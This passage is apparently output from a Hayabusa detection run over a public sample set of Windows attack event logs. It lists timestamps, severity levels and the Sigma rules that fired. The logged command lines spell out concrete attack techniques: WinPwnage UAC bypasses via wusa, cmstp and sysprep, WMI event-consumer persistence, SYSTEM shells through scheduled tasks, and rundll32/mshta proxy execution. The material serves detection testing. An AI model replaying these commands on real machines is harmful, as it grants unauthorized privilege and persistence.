c:\Users\IEUser\Desktop\hellox86.dll",rules/hayabusa/sysmon/events/1_ProcessCreation.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/Privilege Escalation/sysmon_1_7_11_migwiz.evtx +2019-05-12 01:46:20.531 +09:00,IEWIN7,1,informational,Process Creation,"Command: ""C:\Windows\System32\wusa.exe"" c:\users\ieuser\appdata\local\temp\suspicious.cab /extract:C:\Windows\system32\migwiz /quiet : Path: C:\Windows\System32\wusa.exe : User: IEWIN7\IEUser : Parent Command: python winpwnage.py -u uac -i 13 -p c:\Users\IEUser\Desktop\hellox86.dll",rules/hayabusa/sysmon/events/1_ProcessCreation.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/Privilege Escalation/sysmon_1_7_11_migwiz.evtx +2019-05-12 01:46:20.828 +09:00,IEWIN7,1,informational,Process Creation,"Command: ""C:\Windows\System32\wusa.exe"" c:\users\ieuser\appdata\local\temp\suspicious.cab /extract:C:\Windows\system32\migwiz /quiet : Path: C:\Windows\System32\wusa.exe : User: IEWIN7\IEUser : Parent Command: python winpwnage.py -u uac -i 13 -p c:\Users\IEUser\Desktop\hellox86.dll",rules/hayabusa/sysmon/events/1_ProcessCreation.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/Privilege Escalation/sysmon_1_7_11_migwiz.evtx +2019-05-12 01:54:02.071 +09:00,IEWIN7,1,informational,Process Creation,"Command: python winpwnage.py -u uac -i 14 -p c:\Users\IEUser\Desktop\hellox86.dll : Path: C:\Python27\python.exe : User: IEWIN7\IEUser : Parent Command: ""C:\Windows\system32\cmd.exe"" ",rules/hayabusa/sysmon/events/1_ProcessCreation.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/Privilege Escalation/sysmon_1_7_11_sysprep_uacbypass.evtx +2019-05-12 01:54:07.508 +09:00,IEWIN7,1,informational,Process Creation,"Command: ""C:\Windows\System32\makecab.exe"" c:\users\ieuser\appdata\local\temp\CRYPTBASE.dll c:\users\ieuser\appdata\local\temp\suspicious.cab : Path: C:\Windows\System32\makecab.exe : User: IEWIN7\IEUser : Parent Command: python winpwnage.py -u uac -i 14 -p 
c:\Users\IEUser\Desktop\hellox86.dll",rules/hayabusa/sysmon/events/1_ProcessCreation.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/Privilege Escalation/sysmon_1_7_11_sysprep_uacbypass.evtx +2019-05-12 01:54:12.493 +09:00,IEWIN7,1,informational,Process Creation,"Command: ""C:\Windows\System32\wusa.exe"" c:\users\ieuser\appdata\local\temp\suspicious.cab /extract:C:\Windows\system32\sysprep /quiet : Path: C:\Windows\System32\wusa.exe : User: IEWIN7\IEUser : Parent Command: python winpwnage.py -u uac -i 14 -p c:\Users\IEUser\Desktop\hellox86.dll",rules/hayabusa/sysmon/events/1_ProcessCreation.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/Privilege Escalation/sysmon_1_7_11_sysprep_uacbypass.evtx +2019-05-12 01:54:12.821 +09:00,IEWIN7,1,informational,Process Creation,"Command: ""C:\Windows\System32\wusa.exe"" c:\users\ieuser\appdata\local\temp\suspicious.cab /extract:C:\Windows\system32\sysprep /quiet : Path: C:\Windows\System32\wusa.exe : User: IEWIN7\IEUser : Parent Command: python winpwnage.py -u uac -i 14 -p c:\Users\IEUser\Desktop\hellox86.dll",rules/hayabusa/sysmon/events/1_ProcessCreation.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/Privilege Escalation/sysmon_1_7_11_sysprep_uacbypass.evtx +2019-05-12 02:10:06.342 +09:00,IEWIN7,1102,high,Security log was cleared,User: IEUser,rules/hayabusa/default/alerts/Security/1102_IndicatorRemovalOnHost-ClearWindowsEventLogs_SecurityLogCleared.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/Privilege Escalation/security_4624_4673_token_manip.evtx +2019-05-12 02:10:10.889 +09:00,IEWIN7,4624,informational,Logon Type 9 - NewCredentials,User: IEUser : Workstation: : IP Address: ::1 : Port: 0 : LogonID: 0x1bbdce : (Warning: Credentials are stored in memory),rules/hayabusa/default/events/Security/Logons/4624_LogonType-9-NewInteractive.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/Privilege Escalation/security_4624_4673_token_manip.evtx +2019-05-12 02:10:10.889 +09:00,IEWIN7,4624,medium,Pass the Hash Activity 
2,,rules/sigma/builtin/security/win_pass_the_hash_2.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/Privilege Escalation/security_4624_4673_token_manip.evtx +2019-05-12 02:10:10.889 +09:00,IEWIN7,4624,high,Successful Overpass the Hash Attempt,,rules/sigma/builtin/security/win_overpass_the_hash.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/Privilege Escalation/security_4624_4673_token_manip.evtx +2019-05-12 02:28:17.176 +09:00,IEWIN7,1,informational,Process Creation,"Command: python winpwnage.py -u uac -i 17 -p c:\windows\System32\cmd.exe : Path: C:\Python27\python.exe : User: IEWIN7\IEUser : Parent Command: ""C:\Windows\system32\cmd.exe"" ",rules/hayabusa/sysmon/events/1_ProcessCreation.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/Privilege Escalation/sysmon_1_13_11_cmstp_ini_uacbypass.evtx +2019-05-12 02:28:19.567 +09:00,IEWIN7,1,informational,Process Creation,"Command: ""C:\Windows\System32\cmstp.exe"" /au c:\users\ieuser\appdata\local\temp\tmp.ini : Path: C:\Windows\System32\cmstp.exe : User: IEWIN7\IEUser : Parent Command: python winpwnage.py -u uac -i 17 -p c:\windows\System32\cmd.exe",rules/hayabusa/sysmon/events/1_ProcessCreation.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/Privilege Escalation/sysmon_1_13_11_cmstp_ini_uacbypass.evtx +2019-05-12 02:28:19.567 +09:00,IEWIN7,1,high,Bypass UAC via CMSTP,,rules/sigma/process_creation/win_uac_cmstp.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/Privilege Escalation/sysmon_1_13_11_cmstp_ini_uacbypass.evtx +2019-05-12 02:28:22.598 +09:00,IEWIN7,1,informational,Process Creation,Command: c:\windows\System32\cmd.exe : Path: C:\Windows\System32\cmd.exe : User: IEWIN7\IEUser : Parent Command: C:\Windows\system32\DllHost.exe /Processid:{3E5FC7F9-9A51-4367-9063-A120244FBEC7},rules/hayabusa/sysmon/events/1_ProcessCreation.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/Privilege Escalation/sysmon_1_13_11_cmstp_ini_uacbypass.evtx +2019-05-12 02:28:22.598 +09:00,IEWIN7,13,high,CMSTP Execution Registry 
Event,,rules/sigma/registry_event/sysmon_cmstp_execution_by_registry.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/Privilege Escalation/sysmon_1_13_11_cmstp_ini_uacbypass.evtx +2019-05-12 02:28:22.598 +09:00,IEWIN7,1,high,CMSTP UAC Bypass via COM Object Access,,rules/sigma/process_creation/win_cmstp_com_object_access.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/Privilege Escalation/sysmon_1_13_11_cmstp_ini_uacbypass.evtx +2019-05-12 02:57:49.903 +09:00,IEWIN7,1,informational,Process Creation,"Command: python winpwnage.py -u elevate -5 -p c:\Windows\System32\cmd.exe : Path: C:\Python27\python.exe : User: IEWIN7\IEUser : Parent Command: ""C:\Windows\System32\cmd.exe"" ",rules/hayabusa/sysmon/events/1_ProcessCreation.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/Persistence/sysmon_20_21_1_CommandLineEventConsumer.evtx +2019-05-12 02:58:22.809 +09:00,IEWIN7,1,informational,Process Creation,"Command: python winpwnage.py -u elevate -i 5 -p c:\Windows\System32\cmd.exe : Path: C:\Python27\python.exe : User: IEWIN7\IEUser : Parent Command: ""C:\Windows\System32\cmd.exe"" ",rules/hayabusa/sysmon/events/1_ProcessCreation.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/Persistence/sysmon_20_21_1_CommandLineEventConsumer.evtx +2019-05-12 02:58:23.215 +09:00,IEWIN7,1,informational,Process Creation,"Command: ""C:\Windows\System32\wbem\WMIC.exe"" /namespace:""\\root\subscription"" PATH CommandLineEventConsumer CREATE Name=""BotConsumer23"", ExecutablePath=""c:\Windows\System32\cmd.exe"", CommandLineTemplate=""c:\Windows\System32\cmd.exe"" : Path: C:\Windows\System32\wbem\WMIC.exe : User: IEWIN7\IEUser : Parent Command: python winpwnage.py -u elevate -i 5 -p c:\Windows\System32\cmd.exe",rules/hayabusa/sysmon/events/1_ProcessCreation.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/Persistence/sysmon_20_21_1_CommandLineEventConsumer.evtx +2019-05-12 02:58:23.340 +09:00,IEWIN7,20,high,WMI Event 
Subscription,,rules/sigma/wmi_event/sysmon_wmi_event_subscription.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/Persistence/sysmon_20_21_1_CommandLineEventConsumer.evtx +2019-05-12 02:58:23.418 +09:00,IEWIN7,21,high,WMI Event Subscription,,rules/sigma/wmi_event/sysmon_wmi_event_subscription.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/Persistence/sysmon_20_21_1_CommandLineEventConsumer.evtx +2019-05-12 02:58:23.450 +09:00,IEWIN7,1,informational,Process Creation,"Command: ""C:\Windows\System32\wbem\WMIC.exe"" /namespace:""\\root\subscription"" PATH __FilterToConsumerBinding CREATE Filter='__EventFilter.Name=""BotFilter82""', Consumer='CommandLineEventConsumer.Name=""BotConsumer23""' : Path: C:\Windows\System32\wbem\WMIC.exe : User: IEWIN7\IEUser : Parent Command: python winpwnage.py -u elevate -i 5 -p c:\Windows\System32\cmd.exe",rules/hayabusa/sysmon/events/1_ProcessCreation.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/Persistence/sysmon_20_21_1_CommandLineEventConsumer.evtx +2019-05-12 02:58:23.590 +09:00,IEWIN7,1,informational,Process Creation,"Command: ""C:\Windows\System32\wbem\WMIC.exe"" /namespace:""\\root\subscription"" PATH __EventFilter CREATE Name=""BotFilter82"", EventNameSpace=""root\cimv2"", QueryLanguage=""WQL"", Query=""SELECT * FROM __InstanceModificationEvent WITHIN 10 WHERE TargetInstance ISA 'Win32_PerfFormattedData_PerfOS_System'"" : Path: C:\Windows\System32\wbem\WMIC.exe : User: IEWIN7\IEUser : Parent Command: python winpwnage.py -u elevate -i 5 -p c:\Windows\System32\cmd.exe",rules/hayabusa/sysmon/events/1_ProcessCreation.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/Persistence/sysmon_20_21_1_CommandLineEventConsumer.evtx +2019-05-12 02:58:39.746 +09:00,IEWIN7,19,high,WMI Event Subscription,,rules/sigma/wmi_event/sysmon_wmi_event_subscription.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/Persistence/sysmon_20_21_1_CommandLineEventConsumer.evtx +2019-05-12 02:58:50.090 +09:00,IEWIN7,1,informational,Process Creation,Command: 
c:\Windows\System32\cmd.exe : Path: C:\Windows\System32\cmd.exe : User: NT AUTHORITY\SYSTEM : Parent Command: C:\Windows\system32\wbem\wmiprvse.exe -Embedding,rules/hayabusa/sysmon/events/1_ProcessCreation.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/Persistence/sysmon_20_21_1_CommandLineEventConsumer.evtx +2019-05-12 02:58:54.762 +09:00,IEWIN7,10,high,Suspicious GrantedAccess Flags on LSASS Access,,rules/sigma/process_access/win_susp_proc_access_lsass.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/Persistence/sysmon_20_21_1_CommandLineEventConsumer.evtx +2019-05-12 02:58:54.762 +09:00,IEWIN7,10,high,Credentials Dumping Tools Accessing LSASS Memory,,rules/sigma/process_access/sysmon_cred_dump_lsass_access.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/Persistence/sysmon_20_21_1_CommandLineEventConsumer.evtx +2019-05-12 02:58:54.762 +09:00,IEWIN7,10,high,Mimikatz Detection LSASS Access,,rules/sigma/deprecated/sysmon_mimikatz_detection_lsass.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/Persistence/sysmon_20_21_1_CommandLineEventConsumer.evtx +2019-05-12 02:58:54.887 +09:00,IEWIN7,1,informational,Process Creation,"Command: ""C:\Windows\System32\wbem\WMIC.exe"" /namespace:""\\root\subscription"" PATH CommandLineEventConsumer WHERE Name=""BotConsumer23"" DELETE : Path: C:\Windows\System32\wbem\WMIC.exe : User: IEWIN7\IEUser : Parent Command: python winpwnage.py -u elevate -i 5 -p c:\Windows\System32\cmd.exe",rules/hayabusa/sysmon/events/1_ProcessCreation.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/Persistence/sysmon_20_21_1_CommandLineEventConsumer.evtx +2019-05-12 02:58:54.903 +09:00,IEWIN7,20,high,WMI Event Subscription,,rules/sigma/wmi_event/sysmon_wmi_event_subscription.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/Persistence/sysmon_20_21_1_CommandLineEventConsumer.evtx +2019-05-12 02:58:54.981 +09:00,IEWIN7,19,high,WMI Event 
Subscription,,rules/sigma/wmi_event/sysmon_wmi_event_subscription.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/Persistence/sysmon_20_21_1_CommandLineEventConsumer.evtx +2019-05-12 02:58:55.028 +09:00,IEWIN7,1,informational,Process Creation,"Command: ""C:\Windows\System32\wbem\WMIC.exe"" /namespace:""\\root\subscription"" PATH __EventFilter WHERE Name=""BotFilter82"" DELETE : Path: C:\Windows\System32\wbem\WMIC.exe : User: IEWIN7\IEUser : Parent Command: python winpwnage.py -u elevate -i 5 -p c:\Windows\System32\cmd.exe",rules/hayabusa/sysmon/events/1_ProcessCreation.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/Persistence/sysmon_20_21_1_CommandLineEventConsumer.evtx +2019-05-12 02:58:55.090 +09:00,IEWIN7,21,high,WMI Event Subscription,,rules/sigma/wmi_event/sysmon_wmi_event_subscription.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/Persistence/sysmon_20_21_1_CommandLineEventConsumer.evtx +2019-05-12 02:58:55.153 +09:00,IEWIN7,1,informational,Process Creation,"Command: ""C:\Windows\System32\wbem\WMIC.exe"" /namespace:""\\root\subscription"" PATH __FilterToConsumerBinding WHERE Filter='__EventFilter.Name=""BotFilter82""' DELETE : Path: C:\Windows\System32\wbem\WMIC.exe : User: IEWIN7\IEUser : Parent Command: python winpwnage.py -u elevate -i 5 -p c:\Windows\System32\cmd.exe",rules/hayabusa/sysmon/events/1_ProcessCreation.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/Persistence/sysmon_20_21_1_CommandLineEventConsumer.evtx +2019-05-12 03:10:42.434 +09:00,IEWIN7,1,informational,Process Creation,"Command: python winpwnage.py -u elevate -i 1 -p c:\Windows\System32\cmd.exe : Path: C:\Python27\python.exe : User: IEWIN7\IEUser : Parent Command: ""C:\Windows\System32\cmd.exe"" ",rules/hayabusa/sysmon/events/1_ProcessCreation.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/Privilege Escalation/sysmon_privesc_from_admin_to_system_handle_inheritance.evtx +2019-05-12 03:10:42.668 +09:00,IEWIN7,1,informational,Process Creation,Command: c:\Windows\System32\cmd.exe : 
Path: C:\Windows\System32\cmd.exe : User: NT AUTHORITY\SYSTEM : Parent Command: C:\Windows\system32\lsass.exe,rules/hayabusa/sysmon/events/1_ProcessCreation.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/Privilege Escalation/sysmon_privesc_from_admin_to_system_handle_inheritance.evtx +2019-05-12 03:10:42.668 +09:00,IEWIN7,1,high,Abused Debug Privilege by Arbitrary Parent Processes,,rules/sigma/process_creation/sysmon_abusing_debug_privilege.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/Privilege Escalation/sysmon_privesc_from_admin_to_system_handle_inheritance.evtx +2019-05-12 09:32:24.461 +09:00,IEWIN7,1,informational,Process Creation,"Command: python winpwnage.py -u elevate -i 4 -p c:\Windows\System32\cmd.exe : Path: C:\Python27\python.exe : User: IEWIN7\IEUser : Parent Command: ""C:\Windows\System32\cmd.exe"" ",rules/hayabusa/sysmon/events/1_ProcessCreation.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/Privilege Escalation/sysmon_1_11_exec_as_system_via_schedtask.evtx +2019-05-12 09:32:30.211 +09:00,IEWIN7,1,informational,Process Creation,"Command: ""C:\Windows\System32\schtasks.exe"" /create /xml c:\users\ieuser\appdata\local\temp\elevator.xml /tn elevator : Path: C:\Windows\System32\schtasks.exe : User: IEWIN7\IEUser : Parent Command: python winpwnage.py -u elevate -i 4 -p c:\Windows\System32\cmd.exe",rules/hayabusa/sysmon/events/1_ProcessCreation.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/Privilege Escalation/sysmon_1_11_exec_as_system_via_schedtask.evtx +2019-05-12 09:32:30.211 +09:00,IEWIN7,1,low,Scheduled Task Creation,,rules/sigma/process_creation/win_susp_schtask_creation.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/Privilege Escalation/sysmon_1_11_exec_as_system_via_schedtask.evtx +2019-05-12 09:32:30.211 +09:00,IEWIN7,1,high,Suspicius Add Task From User AppData Temp,,rules/sigma/process_creation/win_pc_susp_schtasks_user_temp.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/Privilege Escalation/sysmon_1_11_exec_as_system_via_schedtask.evtx 
+2019-05-12 09:32:35.258 +09:00,IEWIN7,1,informational,Process Creation,"Command: ""C:\Windows\System32\schtasks.exe"" /run /tn elevator : Path: C:\Windows\System32\schtasks.exe : User: IEWIN7\IEUser : Parent Command: python winpwnage.py -u elevate -i 4 -p c:\Windows\System32\cmd.exe",rules/hayabusa/sysmon/events/1_ProcessCreation.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/Privilege Escalation/sysmon_1_11_exec_as_system_via_schedtask.evtx +2019-05-12 09:32:35.352 +09:00,IEWIN7,1,informational,Process Creation,Command: c:\Windows\System32\cmd.exe : Path: C:\Windows\System32\cmd.exe : User: NT AUTHORITY\SYSTEM : Parent Command: taskeng.exe {9C7BC894-6658-423B-9B58-61636DBB1451} S-1-5-18:NT AUTHORITY\System:Service:,rules/hayabusa/sysmon/events/1_ProcessCreation.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/Privilege Escalation/sysmon_1_11_exec_as_system_via_schedtask.evtx +2019-05-12 09:32:40.342 +09:00,IEWIN7,1,informational,Process Creation,"Command: ""C:\Windows\System32\schtasks.exe"" /delete /tn elevator : Path: C:\Windows\System32\schtasks.exe : User: IEWIN7\IEUser : Parent Command: python winpwnage.py -u elevate -i 4 -p c:\Windows\System32\cmd.exe",rules/hayabusa/sysmon/events/1_ProcessCreation.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/Privilege Escalation/sysmon_1_11_exec_as_system_via_schedtask.evtx +2019-05-12 22:30:32.931 +09:00,IEWIN7,1,informational,Process Creation,"Command: python winpwnage.py -u execute -i 9 -p c:\Windows\system32\cmd.exe : Path: C:\Python27\python.exe : User: IEWIN7\IEUser : Parent Command: ""C:\Windows\System32\cmd.exe"" ",rules/hayabusa/sysmon/events/1_ProcessCreation.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/Execution/exec_sysmon_1_11_lolbin_rundll32_openurl_FileProtocolHandler.evtx +2019-05-12 22:30:46.400 +09:00,IEWIN7,1,informational,Process Creation,"Command: ""C:\Windows\System32\rundll32.exe"" ieframe.dll,OpenURL c:\users\ieuser\appdata\local\temp\ieframe.url : Path: C:\Windows\System32\rundll32.exe : 
User: IEWIN7\IEUser : Parent Command: python winpwnage.py -u execute -i 9 -p c:\Windows\system32\cmd.exe",rules/hayabusa/sysmon/events/1_ProcessCreation.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/Execution/exec_sysmon_1_11_lolbin_rundll32_openurl_FileProtocolHandler.evtx +2019-05-12 22:30:46.400 +09:00,IEWIN7,1,medium,Suspicious Rundll32 Activity,,rules/sigma/process_creation/win_susp_rundll32_activity.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/Execution/exec_sysmon_1_11_lolbin_rundll32_openurl_FileProtocolHandler.evtx +2019-05-12 22:30:46.556 +09:00,IEWIN7,1,informational,Process Creation,"Command: ""C:\Windows\system32\cmd.exe"" : Path: C:\Windows\System32\cmd.exe : User: IEWIN7\IEUser : Parent Command: ""C:\Windows\System32\rundll32.exe"" ieframe.dll,OpenURL c:\users\ieuser\appdata\local\temp\ieframe.url",rules/hayabusa/sysmon/events/1_ProcessCreation.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/Execution/exec_sysmon_1_11_lolbin_rundll32_openurl_FileProtocolHandler.evtx +2019-05-12 22:32:58.167 +09:00,IEWIN7,1,informational,Process Creation,"Command: rundll32.exe url.dll,OpenURL file://C:/Windows/system32/calc.exe : Path: C:\Windows\System32\rundll32.exe : User: IEWIN7\IEUser : Parent Command: ""C:\Windows\system32\cmd.exe"" ",rules/hayabusa/sysmon/events/1_ProcessCreation.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/Execution/exec_sysmon_1_11_lolbin_rundll32_openurl_FileProtocolHandler.evtx +2019-05-12 22:32:58.167 +09:00,IEWIN7,1,medium,Suspicious Rundll32 Activity,,rules/sigma/process_creation/win_susp_rundll32_activity.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/Execution/exec_sysmon_1_11_lolbin_rundll32_openurl_FileProtocolHandler.evtx +2019-05-12 22:33:37.078 +09:00,IEWIN7,1,informational,Process Creation,"Command: rundll32.exe url.dll,FileProtocolHandler calc.exe : Path: C:\Windows\System32\rundll32.exe : User: IEWIN7\IEUser : Parent Command: ""C:\Windows\system32\cmd.exe"" 
",rules/hayabusa/sysmon/events/1_ProcessCreation.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/Execution/exec_sysmon_1_11_lolbin_rundll32_openurl_FileProtocolHandler.evtx +2019-05-12 22:33:37.078 +09:00,IEWIN7,1,medium,Suspicious Rundll32 Activity,,rules/sigma/process_creation/win_susp_rundll32_activity.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/Execution/exec_sysmon_1_11_lolbin_rundll32_openurl_FileProtocolHandler.evtx +2019-05-12 22:33:59.743 +09:00,IEWIN7,1,informational,Process Creation,"Command: rundll32.exe url.dll,FileProtocolHandler file://C:/Windows/system32/calc.exe : Path: C:\Windows\System32\rundll32.exe : User: IEWIN7\IEUser : Parent Command: ""C:\Windows\system32\cmd.exe"" ",rules/hayabusa/sysmon/events/1_ProcessCreation.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/Execution/exec_sysmon_1_11_lolbin_rundll32_openurl_FileProtocolHandler.evtx +2019-05-12 22:33:59.743 +09:00,IEWIN7,1,medium,Suspicious Rundll32 Activity,,rules/sigma/process_creation/win_susp_rundll32_activity.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/Execution/exec_sysmon_1_11_lolbin_rundll32_openurl_FileProtocolHandler.evtx +2019-05-12 22:38:00.523 +09:00,IEWIN7,1,informational,Process Creation,"Command: rundll32.exe url.dll,FileProtocolHandler file:///C:/programdata/calc.hta : Path: C:\Windows\System32\rundll32.exe : User: IEWIN7\IEUser : Parent Command: ""C:\Windows\system32\cmd.exe"" ",rules/hayabusa/sysmon/events/1_ProcessCreation.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/Execution/exec_sysmon_1_11_lolbin_rundll32_openurl_FileProtocolHandler.evtx +2019-05-12 22:38:00.523 +09:00,IEWIN7,1,medium,Suspicious Rundll32 Activity,,rules/sigma/process_creation/win_susp_rundll32_activity.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/Execution/exec_sysmon_1_11_lolbin_rundll32_openurl_FileProtocolHandler.evtx +2019-05-12 22:38:00.712 +09:00,IEWIN7,1,informational,Process Creation,"Command: ""C:\Windows\System32\mshta.exe"" ""C:\programdata\calc.hta"" : Path: 
C:\Windows\System32\mshta.exe : User: IEWIN7\IEUser : Parent Command: rundll32.exe url.dll,FileProtocolHandler file:///C:/programdata/calc.hta",rules/hayabusa/sysmon/events/1_ProcessCreation.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/Execution/exec_sysmon_1_11_lolbin_rundll32_openurl_FileProtocolHandler.evtx +2019-05-12 22:38:00.712 +09:00,IEWIN7,1,high,MSHTA Suspicious Execution 01,,rules/sigma/process_creation/win_susp_mshta_execution.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/Execution/exec_sysmon_1_11_lolbin_rundll32_openurl_FileProtocolHandler.evtx +2019-05-12 22:38:00.712 +09:00,IEWIN7,1,high,Windows Shell Spawning Suspicious Program,,rules/sigma/process_creation/win_shell_spawn_susp_program.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/Execution/exec_sysmon_1_11_lolbin_rundll32_openurl_FileProtocolHandler.evtx +2019-05-12 22:38:00.712 +09:00,IEWIN7,1,high,Suspicious MSHTA Process Patterns,,rules/sigma/process_creation/win_susp_mshta_pattern.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/Execution/exec_sysmon_1_11_lolbin_rundll32_openurl_FileProtocolHandler.evtx +2019-05-12 22:38:01.383 +09:00,IEWIN7,1,informational,Process Creation,"Command: ""C:\Windows\System32\calc.exe"" : Path: C:\Windows\System32\calc.exe : User: IEWIN7\IEUser : Parent Command: ""C:\Windows\System32\mshta.exe"" ""C:\programdata\calc.hta"" ",rules/hayabusa/sysmon/events/1_ProcessCreation.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/Execution/exec_sysmon_1_11_lolbin_rundll32_openurl_FileProtocolHandler.evtx +2019-05-12 22:55:56.626 +09:00,IEWIN7,1,informational,Process Creation,"Command: python winpwnage.py -u execute -i 12 -p c:\Windows\System32\calc.exe : Path: C:\Python27\python.exe : User: IEWIN7\IEUser : Parent Command: ""C:\Windows\system32\cmd.exe"" ",rules/hayabusa/sysmon/events/1_ProcessCreation.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/Execution/exec_sysmon_1_11_lolbin_rundll32_shdocvw_openurl.evtx +2019-05-12 22:56:12.652 
+09:00,IEWIN7,1,informational,Process Creation,"Command: ""C:\Windows\System32\rundll32.exe"" shdocvw.dll,OpenURL c:\users\ieuser\appdata\local\temp\shdocvw.url : Path: C:\Windows\System32\rundll32.exe : User: IEWIN7\IEUser : Parent Command: python winpwnage.py -u execute -i 12 -p c:\Windows\System32\calc.exe",rules/hayabusa/sysmon/events/1_ProcessCreation.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/Execution/exec_sysmon_1_11_lolbin_rundll32_shdocvw_openurl.evtx +2019-05-12 22:56:12.652 +09:00,IEWIN7,1,medium,Suspicious Rundll32 Activity,,rules/sigma/process_creation/win_susp_rundll32_activity.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/Execution/exec_sysmon_1_11_lolbin_rundll32_shdocvw_openurl.evtx +2019-05-12 22:58:39.850 +09:00,IEWIN7,1,informational,Process Creation,"Command: python winpwnage.py -u execute -i 14 -p c:\Windows\System32\calc.exe : Path: C:\Python27\python.exe : User: IEWIN7\IEUser : Parent Command: ""C:\Windows\system32\cmd.exe"" ",rules/hayabusa/sysmon/events/1_ProcessCreation.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/Execution/exec_sysmon_1_11_lolbin_rundll32_zipfldr_RouteTheCall.evtx +2019-05-12 22:58:54.897 +09:00,IEWIN7,1,informational,Process Creation,"Command: ""C:\Windows\System32\rundll32.exe"" zipfldr.dll,RouteTheCall c:\Windows\System32\calc.exe : Path: C:\Windows\System32\rundll32.exe : User: IEWIN7\IEUser : Parent Command: python winpwnage.py -u execute -i 14 -p c:\Windows\System32\calc.exe",rules/hayabusa/sysmon/events/1_ProcessCreation.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/Execution/exec_sysmon_1_11_lolbin_rundll32_zipfldr_RouteTheCall.evtx +2019-05-12 22:58:54.897 +09:00,IEWIN7,1,medium,Suspicious Rundll32 Activity,,rules/sigma/process_creation/win_susp_rundll32_activity.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/Execution/exec_sysmon_1_11_lolbin_rundll32_zipfldr_RouteTheCall.evtx +2019-05-12 23:18:03.589 +09:00,IEWIN7,1,informational,Process Creation,"Command: ""C:\Windows\system32\cmd.exe"" : Path: 
